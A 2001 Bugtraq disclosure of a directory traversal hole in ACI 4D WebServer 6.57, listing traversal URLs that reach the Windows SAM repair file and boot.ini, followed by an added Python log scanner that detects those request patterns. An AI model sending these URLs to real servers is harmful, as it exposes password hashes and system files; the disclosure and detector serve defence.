[22329] in bugtraq


ACI 4D WebServer Directory traversal.

daemon@ATHENA.MIT.EDU (KRFinisterre@checkfree.com)
Mon Aug 20 14:03:25 2001

To: bugtraq@security-focus.com
Message-ID: <OF7F14F084.50BEED60-ON85256AAE.00511CCC@ckfr.com>
From: KRFinisterre@checkfree.com
Date: Mon, 20 Aug 2001 10:51:00 -0400
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii


----- Forwarded by Kevin R Finisterre/OH/CheckFree on 08/20/2001 10:43 AM -----

From:    KF <dotslash@snosoft.com>
Sent by: elguapo@clmboh1-smtp3.columbus.rr.com
Date:    08/18/2001 09:39 PM
To:      sales@4D.com, recon@snosoft.com
cc:
Subject: I have found a security hole in your product...




vendor: http://www.4d.com/
current version: 6.7
tested version: 6.57, others?

This directory traversal hole seems to work on
ACI 4d webserver running on the NT platform. I would imagine
exploitation on a macos box would be similar but would require
the proper mac filesystem path to the file you wish to view.

Server: ACI-4D/6.57

http://host + one of the following URLs.

/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini

-KF
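
Added example, not part of the original post or of any 4D code: a log check that flags requests shaped like the URLs listed above (a /4DBin/_/ prefix followed by a drive-letter path or a ".." segment). Handling percent-encoded forms goes beyond the cases in the post, and the Common Log Format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Prefix taken from the URLs in the advisory; compared case-insensitively
# (assumption: a detector should not depend on the server's case handling).
PREFIX = "/4dbin/_/"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
DRIVE_RE = re.compile(r"^[a-z]:", re.IGNORECASE)

def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e both become '..'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(path):
    """Return the reasons a request path resembles the reported traversal."""
    path = decode_fully(path.split("?", 1)[0]).replace("\\", "/")
    if not path.lower().startswith(PREFIX):
        return []
    rest = path[len(PREFIX):]
    reasons = []
    if DRIVE_RE.match(rest):
        reasons.append("drive-letter path")
    if ".." in rest.split("/"):
        reasons.append("parent-directory segment")
    return reasons

def scan(log_lines):
    """Yield (line_number, raw_path, reasons) for each suspicious request."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if m and (reasons := classify(m.group(1))):
            yield n, m.group(1), reasons

# Constructed sample log lines (Common Log Format); not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Aug/2001:10:51:00 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [20/Aug/2001:10:52:11 -0400] "GET /4DBin/_/../boot.ini HTTP/1.0" 200 211',
    '192.0.2.77 - - [20/Aug/2001:10:52:15 -0400] "GET /4DBin/_/C:/inetpub/../boot.ini HTTP/1.0" 200 211',
    '192.0.2.77 - - [20/Aug/2001:10:52:19 -0400] "GET /4dbin/_/%2e%2e/boot.ini HTTP/1.0" 200 211',
    '192.0.2.10 - - [20/Aug/2001:10:53:02 -0400] "GET /4DBin/_/logo.gif HTTP/1.0" 200 3200',
]

if __name__ == "__main__":
    for n, path, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {path} -> {', '.join(reasons)}")
```

A 200 status on a flagged line is the case to triage first, since it suggests the file was actually served.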





